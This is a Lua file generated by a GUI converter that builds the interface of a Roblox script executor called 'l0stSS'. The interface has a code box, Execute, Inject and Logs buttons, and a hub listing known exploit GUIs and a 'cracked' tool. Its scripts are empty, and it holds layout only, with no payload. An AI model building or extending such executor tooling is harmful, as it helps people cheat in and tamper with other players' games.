--[=[
 d888b  db    db d888888b      .d888b.      db      db    db  .d8b.  
88' Y8b 88    88   `88'        VP  `8D      88      88    88 d8' `8b 
88      88    88    88            odD'      88      88    88 88ooo88 
88  ooo 88    88    88          .88'        88      88    88 88~~~88 
88. ~8~ 88b  d88   .88.        j88.         88booo. 88b  d88 88   88    @uniquadev
 Y888P  ~Y8888P' Y888888P      888888D      Y88888P ~Y8888P' YP   YP  CONVERTER 
]=]

-- Instances: 113 | Scripts: 27 | Modules: 0 | Tags: 0
local G2L = {};

-- StarterGui.ScreenGui
G2L["1"] = Instance.new("ScreenGui", game:GetService("CoreGui"));
G2L["1"]["ZIndexBehavior"] = Enum.ZIndexBehavior.Sibling;


-- StarterGui.ScreenGui.LocalScript
G2L["2"] = Instance.new("LocalScript", G2L["1"]);



-- StarterGui.ScreenGui.LocalScript
G2L["3"] = Instance.new("LocalScript", G2L["1"]);



-- StarterGui.ScreenGui.Frame
G2L["4"] = Instance.new("Frame", G2L["1"]);
G2L["4"]["BorderSizePixel"] = 0;
G2L["4"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["4"]["Size"] = UDim2.new(0, 417, 0, 296);
G2L["4"]["Position"] = UDim2.new(0.2379, 0, 0.25628, 0);
G2L["4"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.LocalScript
G2L["5"] = Instance.new("LocalScript", G2L["4"]);



-- StarterGui.ScreenGui.Frame.Frame2
G2L["6"] = Instance.new("Frame", G2L["4"]);
G2L["6"]["BorderSizePixel"] = 0;
G2L["6"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["6"]["Size"] = UDim2.new(0, 417, 0, 50);
G2L["6"]["Position"] = UDim2.new(0, 0, -0.00338, 0);
G2L["6"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6"]["Name"] = [[Frame2]];


-- StarterGui.ScreenGui.Frame.Frame2.TextLabel
G2L["7"] = Instance.new("TextLabel", G2L["6"]);
G2L["7"]["TextWrapped"] = true;
G2L["7"]["BorderSizePixel"] = 0;
G2L["7"]["TextSize"] = 14;
G2L["7"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["7"]["TextYAlignment"] = Enum.TextYAlignment.Top;
G2L["7"]["TextScaled"] = true;
G2L["7"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["7"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["7"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["7"]["BackgroundTransparency"] = 1;
G2L["7"]["Size"] = UDim2.new(0, 394, 0, 26);
G2L["7"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["7"]["Text"] = [[l0stSS]];
G2L["7"]["Position"] = UDim2.new(0.04317, 0, -0.02083, 0);


-- StarterGui.ScreenGui.Frame.Frame2.Frame
G2L["8"] = Instance.new("Frame", G2L["6"]);
G2L["8"]["BorderSizePixel"] = 0;
G2L["8"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["8"]["Size"] = UDim2.new(0, 463, 0, 11);
G2L["8"]["Position"] = UDim2.new(-0.09832, 0, -0.20833, 0);
G2L["8"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.Frame2.Frame
G2L["9"] = Instance.new("Frame", G2L["6"]);
G2L["9"]["BorderSizePixel"] = 0;
G2L["9"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["9"]["Size"] = UDim2.new(0, 411, 0, 6);
G2L["9"]["Position"] = UDim2.new(0.02531, 0, 0.54167, 0);
G2L["9"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.TextBox
G2L["a"] = Instance.new("TextBox", G2L["4"]);
G2L["a"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["a"]["PlaceholderColor3"] = Color3.fromRGB(255, 255, 255);
G2L["a"]["ZIndex"] = 8;
G2L["a"]["BorderSizePixel"] = 0;
G2L["a"]["TextWrapped"] = true;
G2L["a"]["TextSize"] = 14;
G2L["a"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["a"]["TextYAlignment"] = Enum.TextYAlignment.Top;
G2L["a"]["BackgroundColor3"] = Color3.fromRGB(59, 59, 59);
G2L["a"]["FontFace"] = Font.new([[rbxasset://fonts/families/HighwayGothic.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["a"]["BorderMode"] = Enum.BorderMode.Middle;
G2L["a"]["PlaceholderText"] = [[-- by l0stk1dd88]];
G2L["a"]["Size"] = UDim2.new(0, 390, 0, 180);
G2L["a"]["Position"] = UDim2.new(0.05036, 0, 0.13675, 0);
G2L["a"]["BorderColor3"] = Color3.fromRGB(255, 255, 255);
G2L["a"]["Text"] = [[]];


-- StarterGui.ScreenGui.Frame.TextBox.LocalScript
G2L["b"] = Instance.new("LocalScript", G2L["a"]);



-- StarterGui.ScreenGui.Frame.TextBox.LocalScript
G2L["c"] = Instance.new("LocalScript", G2L["a"]);



-- StarterGui.ScreenGui.Frame.TextBox.Completor
G2L["d"] = Instance.new("LocalScript", G2L["a"]);
G2L["d"]["Name"] = [[Completor]];


-- StarterGui.ScreenGui.Frame.TextBox.UICorner
G2L["e"] = Instance.new("UICorner", G2L["a"]);



-- StarterGui.ScreenGui.Frame.TextBox.UIStroke
G2L["f"] = Instance.new("UIStroke", G2L["a"]);
G2L["f"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["f"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.TextBox.LocalScript
G2L["10"] = Instance.new("LocalScript", G2L["a"]);



-- StarterGui.ScreenGui.Frame.TextBox.LocalScript
G2L["11"] = Instance.new("LocalScript", G2L["a"]);



-- StarterGui.ScreenGui.Frame.TextBox.LocalScript
G2L["12"] = Instance.new("LocalScript", G2L["a"]);



-- StarterGui.ScreenGui.Frame.ScriptHubFrame
G2L["13"] = Instance.new("ScrollingFrame", G2L["4"]);
G2L["13"]["Active"] = true;
G2L["13"]["ScrollingDirection"] = Enum.ScrollingDirection.Y;
G2L["13"]["BorderSizePixel"] = 0;
G2L["13"]["CanvasSize"] = UDim2.new(0, 0, 0, 0);
G2L["13"]["BackgroundColor3"] = Color3.fromRGB(92, 92, 92);
G2L["13"]["Name"] = [[ScriptHubFrame]];
G2L["13"]["AutomaticCanvasSize"] = Enum.AutomaticSize.Y;
G2L["13"]["Size"] = UDim2.new(0, 98, 0, 319);
G2L["13"]["Position"] = UDim2.new(1.01439, 0, -0.03378, 0);
G2L["13"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["13"]["ScrollBarThickness"] = 3;


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.LocalScript
G2L["14"] = Instance.new("LocalScript", G2L["13"]);



-- StarterGui.ScreenGui.Frame.ScriptHubFrame.Stroke
G2L["15"] = Instance.new("LocalScript", G2L["13"]);
G2L["15"]["Name"] = [[Stroke]];


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.c00lgui
G2L["16"] = Instance.new("TextButton", G2L["13"]);
G2L["16"]["TextWrapped"] = true;
G2L["16"]["BorderSizePixel"] = 0;
G2L["16"]["TextSize"] = 14;
G2L["16"]["TextScaled"] = true;
G2L["16"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["16"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["16"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["16"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["16"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["16"]["Text"] = [[c00lgui]];
G2L["16"]["Name"] = [[c00lgui]];


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.polaria
G2L["17"] = Instance.new("TextButton", G2L["13"]);
G2L["17"]["TextWrapped"] = true;
G2L["17"]["BorderSizePixel"] = 0;
G2L["17"]["TextSize"] = 14;
G2L["17"]["TextScaled"] = true;
G2L["17"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["17"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["17"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["17"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["17"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["17"]["Text"] = [[Polaria]];
G2L["17"]["Name"] = [[polaria]];
G2L["17"]["Position"] = UDim2.new(0, 0, 0.11285, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.hdadmin
G2L["18"] = Instance.new("TextButton", G2L["13"]);
G2L["18"]["TextWrapped"] = true;
G2L["18"]["BorderSizePixel"] = 0;
G2L["18"]["TextSize"] = 14;
G2L["18"]["TextScaled"] = true;
G2L["18"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["18"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["18"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["18"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["18"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["18"]["Text"] = [[HD Admin]];
G2L["18"]["Name"] = [[hdadmin]];
G2L["18"]["Position"] = UDim2.new(0, 0, 0.22571, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.UIListLayout
G2L["19"] = Instance.new("UIListLayout", G2L["13"]);
G2L["19"]["Padding"] = UDim.new(0, 5);
G2L["19"]["SortOrder"] = Enum.SortOrder.LayoutOrder;


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.1xgui
G2L["1a"] = Instance.new("TextButton", G2L["13"]);
G2L["1a"]["TextWrapped"] = true;
G2L["1a"]["BorderSizePixel"] = 0;
G2L["1a"]["TextSize"] = 14;
G2L["1a"]["TextScaled"] = true;
G2L["1a"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1a"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["1a"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1a"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["1a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1a"]["Text"] = [[1x1x1x1 GUI]];
G2L["1a"]["Name"] = [[1xgui]];
G2L["1a"]["Position"] = UDim2.new(0, 0, 0.45141, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.c00lkidd
G2L["1b"] = Instance.new("TextButton", G2L["13"]);
G2L["1b"]["TextWrapped"] = true;
G2L["1b"]["BorderSizePixel"] = 0;
G2L["1b"]["TextSize"] = 14;
G2L["1b"]["TextScaled"] = true;
G2L["1b"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1b"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["1b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1b"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["1b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1b"]["Text"] = [[Forsaken c00lkidd]];
G2L["1b"]["Name"] = [[c00lkidd]];
G2L["1b"]["Position"] = UDim2.new(0, 0, 2.59561, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.happyhub
G2L["1c"] = Instance.new("TextButton", G2L["13"]);
G2L["1c"]["TextWrapped"] = true;
G2L["1c"]["BorderSizePixel"] = 0;
G2L["1c"]["TextSize"] = 14;
G2L["1c"]["TextScaled"] = true;
G2L["1c"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1c"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["1c"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1c"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["1c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1c"]["Text"] = [[Happy Hub]];
G2L["1c"]["Name"] = [[happyhub]];
G2L["1c"]["Position"] = UDim2.new(0, 0, 3.04702, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.fatgui
G2L["1d"] = Instance.new("TextButton", G2L["13"]);
G2L["1d"]["TextWrapped"] = true;
G2L["1d"]["BorderSizePixel"] = 0;
G2L["1d"]["TextSize"] = 14;
G2L["1d"]["TextScaled"] = true;
G2L["1d"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1d"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["1d"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1d"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["1d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1d"]["Text"] = [[TeamFat GUI]];
G2L["1d"]["Name"] = [[fatgui]];


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.rc7
G2L["1e"] = Instance.new("TextButton", G2L["13"]);
G2L["1e"]["TextWrapped"] = true;
G2L["1e"]["BorderSizePixel"] = 0;
G2L["1e"]["TextSize"] = 14;
G2L["1e"]["TextScaled"] = true;
G2L["1e"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1e"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["1e"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1e"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["1e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1e"]["Text"] = [[RC7 Executor]];
G2L["1e"]["Name"] = [[rc7]];
G2L["1e"]["Position"] = UDim2.new(0, 0, 2.59561, 0);


-- StarterGui.ScreenGui.Frame.ScriptHubFrame.crack
G2L["1f"] = Instance.new("TextButton", G2L["13"]);
G2L["1f"]["TextWrapped"] = true;
G2L["1f"]["BorderSizePixel"] = 0;
G2L["1f"]["TextSize"] = 14;
G2L["1f"]["TextScaled"] = true;
G2L["1f"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1f"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40);
G2L["1f"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1f"]["Size"] = UDim2.new(0, 90, 0, 31);
G2L["1f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1f"]["Text"] = [[l0stGUI cracked]];
G2L["1f"]["Name"] = [[crack]];
G2L["1f"]["Position"] = UDim2.new(0, 0, 2.59561, 0);


-- StarterGui.ScreenGui.Frame.Execute
G2L["20"] = Instance.new("ImageButton", G2L["4"]);
G2L["20"]["BorderSizePixel"] = 0;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["20"]["BackgroundColor3"] = Color3.fromRGB(25, 25, 25);
G2L["20"]["Image"] = [[rbxassetid://12099513379]];
G2L["20"]["Size"] = UDim2.new(0, 50, 0, 50);
G2L["20"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["20"]["Name"] = [[Execute]];
G2L["20"]["Position"] = UDim2.new(0.05036, 0, 0.78378, 0);


-- StarterGui.ScreenGui.Frame.Execute.LocalScript
G2L["21"] = Instance.new("LocalScript", G2L["20"]);



-- StarterGui.ScreenGui.Frame.Execute.UICorner
G2L["22"] = Instance.new("UICorner", G2L["20"]);



-- StarterGui.ScreenGui.Frame.Execute.UIStroke
G2L["23"] = Instance.new("UIStroke", G2L["20"]);
G2L["23"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["23"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.Clear
G2L["24"] = Instance.new("ImageButton", G2L["4"]);
G2L["24"]["BorderSizePixel"] = 0;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["24"]["BackgroundColor3"] = Color3.fromRGB(25, 25, 25);
G2L["24"]["Image"] = [[rbxassetid://9348208337]];
G2L["24"]["Size"] = UDim2.new(0, 50, 0, 50);
G2L["24"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["24"]["Name"] = [[Clear]];
G2L["24"]["Position"] = UDim2.new(0.19664, 0, 0.78378, 0);


-- StarterGui.ScreenGui.Frame.Clear.LocalScript
G2L["25"] = Instance.new("LocalScript", G2L["24"]);



-- StarterGui.ScreenGui.Frame.Clear.UICorner
G2L["26"] = Instance.new("UICorner", G2L["24"]);



-- StarterGui.ScreenGui.Frame.Clear.UIStroke
G2L["27"] = Instance.new("UIStroke", G2L["24"]);
G2L["27"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["27"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.Inject
G2L["28"] = Instance.new("ImageButton", G2L["4"]);
G2L["28"]["BorderSizePixel"] = 0;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["28"]["BackgroundColor3"] = Color3.fromRGB(25, 25, 25);
G2L["28"]["Image"] = [[rbxassetid://136911114506878]];
G2L["28"]["Size"] = UDim2.new(0, 50, 0, 50);
G2L["28"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["28"]["Name"] = [[Inject]];
G2L["28"]["Position"] = UDim2.new(0.86811, 0, 0.78378, 0);


-- StarterGui.ScreenGui.Frame.Inject.LocalScript
G2L["29"] = Instance.new("LocalScript", G2L["28"]);



-- StarterGui.ScreenGui.Frame.Inject.LocalScript
G2L["2a"] = Instance.new("LocalScript", G2L["28"]);



-- StarterGui.ScreenGui.Frame.Inject.LocalScript
G2L["2b"] = Instance.new("LocalScript", G2L["28"]);



-- StarterGui.ScreenGui.Frame.Inject.UICorner
G2L["2c"] = Instance.new("UICorner", G2L["28"]);



-- StarterGui.ScreenGui.Frame.Inject.UIStroke
G2L["2d"] = Instance.new("UIStroke", G2L["28"]);
G2L["2d"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["2d"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.ImageButton
G2L["2e"] = Instance.new("ImageButton", G2L["4"]);
G2L["2e"]["BorderSizePixel"] = 0;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["2e"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["2e"]["ZIndex"] = 2;
G2L["2e"]["Image"] = [[rbxassetid://5107183916]];
G2L["2e"]["Size"] = UDim2.new(0, 40, 0, 36);
G2L["2e"]["BorderColor3"] = Color3.fromRGB(27, 27, 27);
G2L["2e"]["Position"] = UDim2.new(-0.079, 0, 0.16873, 0);


-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
G2L["2f"] = Instance.new("LocalScript", G2L["2e"]);



-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
G2L["30"] = Instance.new("LocalScript", G2L["2e"]);



-- StarterGui.ScreenGui.Frame.ImageButton.UICorner
G2L["31"] = Instance.new("UICorner", G2L["2e"]);



-- StarterGui.ScreenGui.Frame.ImageButton.UIStroke
G2L["32"] = Instance.new("UIStroke", G2L["2e"]);
G2L["32"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.Line
G2L["33"] = Instance.new("Frame", G2L["4"]);
G2L["33"]["BorderSizePixel"] = 0;
G2L["33"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["33"]["Size"] = UDim2.new(0, 417, 0, 13);
G2L["33"]["Position"] = UDim2.new(0, 0, 1, 0);
G2L["33"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["33"]["Name"] = [[Line]];


-- StarterGui.ScreenGui.Frame.Line
G2L["34"] = Instance.new("Frame", G2L["4"]);
G2L["34"]["BorderSizePixel"] = 0;
G2L["34"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["34"]["Size"] = UDim2.new(0, 33, 0, 310);
G2L["34"]["Position"] = UDim2.new(-0.07914, 0, -0.03378, 0);
G2L["34"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["34"]["Name"] = [[Line]];


-- StarterGui.ScreenGui.Frame.Line.Line
G2L["35"] = Instance.new("Frame", G2L["34"]);
G2L["35"]["BorderSizePixel"] = 0;
G2L["35"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["35"]["Size"] = UDim2.new(0, 61, 0, 10);
G2L["35"]["Position"] = UDim2.new(-0.24242, 0, 0, 0);
G2L["35"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["35"]["Name"] = [[Line]];


-- StarterGui.ScreenGui.Frame.Line.ImageLabel
G2L["36"] = Instance.new("ImageLabel", G2L["34"]);
G2L["36"]["ZIndex"] = 10;
G2L["36"]["BorderSizePixel"] = 0;
G2L["36"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["36"]["Image"] = [[rbxassetid://81013369562879]];
G2L["36"]["Size"] = UDim2.new(0, 45, 0, 41);
G2L["36"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["36"]["BackgroundTransparency"] = 1;
G2L["36"]["Position"] = UDim2.new(-0.09091, 0, 0.02903, 0);


-- StarterGui.ScreenGui.Frame.Line.Frame
G2L["37"] = Instance.new("Frame", G2L["34"]);
G2L["37"]["ZIndex"] = 1111111111;
G2L["37"]["BorderSizePixel"] = 0;
G2L["37"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["37"]["Size"] = UDim2.new(0, 47, 0, 10);
G2L["37"]["Position"] = UDim2.new(-0.13473, 0, 0.16237, 0);
G2L["37"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.Line.Frame
G2L["38"] = Instance.new("Frame", G2L["34"]);
G2L["38"]["ZIndex"] = 1111111111;
G2L["38"]["BorderSizePixel"] = 0;
G2L["38"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["38"]["Size"] = UDim2.new(0, 47, 0, 10);
G2L["38"]["Position"] = UDim2.new(-0.04382, 0, 0.29785, 0);
G2L["38"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.Line.Frame
G2L["39"] = Instance.new("Frame", G2L["34"]);
G2L["39"]["ZIndex"] = 1111111111;
G2L["39"]["BorderSizePixel"] = 0;
G2L["39"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["39"]["Size"] = UDim2.new(0, 47, 0, 10);
G2L["39"]["Position"] = UDim2.new(-0.10443, 0, 0.44624, 0);
G2L["39"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.Line.Frame
G2L["3a"] = Instance.new("Frame", G2L["34"]);
G2L["3a"]["ZIndex"] = 1111111111;
G2L["3a"]["BorderSizePixel"] = 0;
G2L["3a"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["3a"]["Size"] = UDim2.new(0, 47, 0, 10);
G2L["3a"]["Position"] = UDim2.new(-0.10443, 0, 0.5914, 0);
G2L["3a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.Line.Frame
G2L["3b"] = Instance.new("Frame", G2L["34"]);
G2L["3b"]["ZIndex"] = 1111111111;
G2L["3b"]["BorderSizePixel"] = 0;
G2L["3b"]["BackgroundColor3"] = Color3.fromRGB(27, 27, 27);
G2L["3b"]["Size"] = UDim2.new(0, 47, 0, 124);
G2L["3b"]["Position"] = UDim2.new(-0.10443, 0, 0.62366, 0);
G2L["3b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.Line.Frame.TextLabel
G2L["3c"] = Instance.new("TextLabel", G2L["3b"]);
G2L["3c"]["TextWrapped"] = true;
G2L["3c"]["BorderSizePixel"] = 0;
G2L["3c"]["TextSize"] = 14;
G2L["3c"]["TextScaled"] = true;
G2L["3c"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["3c"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["3c"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["3c"]["BackgroundTransparency"] = 1;
G2L["3c"]["Size"] = UDim2.new(0, 38, 0, 37);
G2L["3c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["3c"]["Text"] = [[3.7.6]];
G2L["3c"]["Position"] = UDim2.new(0.06383, 0, 0.39024, 0);


-- StarterGui.ScreenGui.Frame.Line.Frame.TextLabel.LocalScript
G2L["3d"] = Instance.new("LocalScript", G2L["3c"]);



-- StarterGui.ScreenGui.Frame.Line
G2L["3e"] = Instance.new("Frame", G2L["4"]);
G2L["3e"]["ZIndex"] = 3;
G2L["3e"]["BorderSizePixel"] = 0;
G2L["3e"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["3e"]["Size"] = UDim2.new(0, 6, 0, 311);
G2L["3e"]["Position"] = UDim2.new(0.01679, 0, -0.0069, 0);
G2L["3e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["3e"]["Name"] = [[Line]];


-- StarterGui.ScreenGui.Frame.Line
G2L["3f"] = Instance.new("Frame", G2L["4"]);
G2L["3f"]["ZIndex"] = 3;
G2L["3f"]["BorderSizePixel"] = 0;
G2L["3f"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["3f"]["Size"] = UDim2.new(0, 8, 0, 311);
G2L["3f"]["Position"] = UDim2.new(-0.09832, 0, -0.0069, 0);
G2L["3f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["3f"]["Name"] = [[Line]];


-- StarterGui.ScreenGui.Frame.Line
G2L["40"] = Instance.new("Frame", G2L["4"]);
G2L["40"]["ZIndex"] = 3;
G2L["40"]["BorderSizePixel"] = 0;
G2L["40"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["40"]["Size"] = UDim2.new(0, 464, 0, 9);
G2L["40"]["Position"] = UDim2.new(-0.09832, 0, 1.01351, 0);
G2L["40"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["40"]["Name"] = [[Line]];


-- StarterGui.ScreenGui.Frame.Line
G2L["41"] = Instance.new("Frame", G2L["4"]);
G2L["41"]["ZIndex"] = 3;
G2L["41"]["BorderSizePixel"] = 0;
G2L["41"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["41"]["Size"] = UDim2.new(0, -6, 0, 319);
G2L["41"]["Position"] = UDim2.new(1.01439, 0, -0.03378, 0);
G2L["41"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["41"]["Name"] = [[Line]];


-- StarterGui.ScreenGui.Frame.Close
G2L["42"] = Instance.new("ImageButton", G2L["4"]);
G2L["42"]["BorderSizePixel"] = 0;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["42"]["BackgroundColor3"] = Color3.fromRGB(41, 41, 41);
G2L["42"]["ZIndex"] = 2;
G2L["42"]["Image"] = [[rbxassetid://12935062141]];
G2L["42"]["Size"] = UDim2.new(0, 37, 0, 37);
G2L["42"]["BorderColor3"] = Color3.fromRGB(27, 27, 27);
G2L["42"]["Name"] = [[Close]];
G2L["42"]["Position"] = UDim2.new(-0.07914, 0, 0.46411, 0);


-- StarterGui.ScreenGui.Frame.Close.LocalScript
G2L["43"] = Instance.new("LocalScript", G2L["42"]);



-- StarterGui.ScreenGui.Frame.Close.LocalScript
G2L["44"] = Instance.new("LocalScript", G2L["42"]);



-- StarterGui.ScreenGui.Frame.Close.UIStroke
G2L["45"] = Instance.new("UIStroke", G2L["42"]);
G2L["45"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.Close.UICorner
G2L["46"] = Instance.new("UICorner", G2L["42"]);



-- StarterGui.ScreenGui.Frame.Logs
G2L["47"] = Instance.new("ImageButton", G2L["4"]);
G2L["47"]["BorderSizePixel"] = 0;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["47"]["BackgroundColor3"] = Color3.fromRGB(25, 25, 25);
G2L["47"]["Image"] = [[rbxassetid://7546954294]];
G2L["47"]["Size"] = UDim2.new(0, 50, 0, 50);
G2L["47"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["47"]["Name"] = [[Logs]];
G2L["47"]["Position"] = UDim2.new(0.71942, 0, 0.78378, 0);


-- StarterGui.ScreenGui.Frame.Logs.LocalScript
G2L["48"] = Instance.new("LocalScript", G2L["47"]);



-- StarterGui.ScreenGui.Frame.Logs.LocalScript
G2L["49"] = Instance.new("LocalScript", G2L["47"]);



-- StarterGui.ScreenGui.Frame.Logs.UICorner
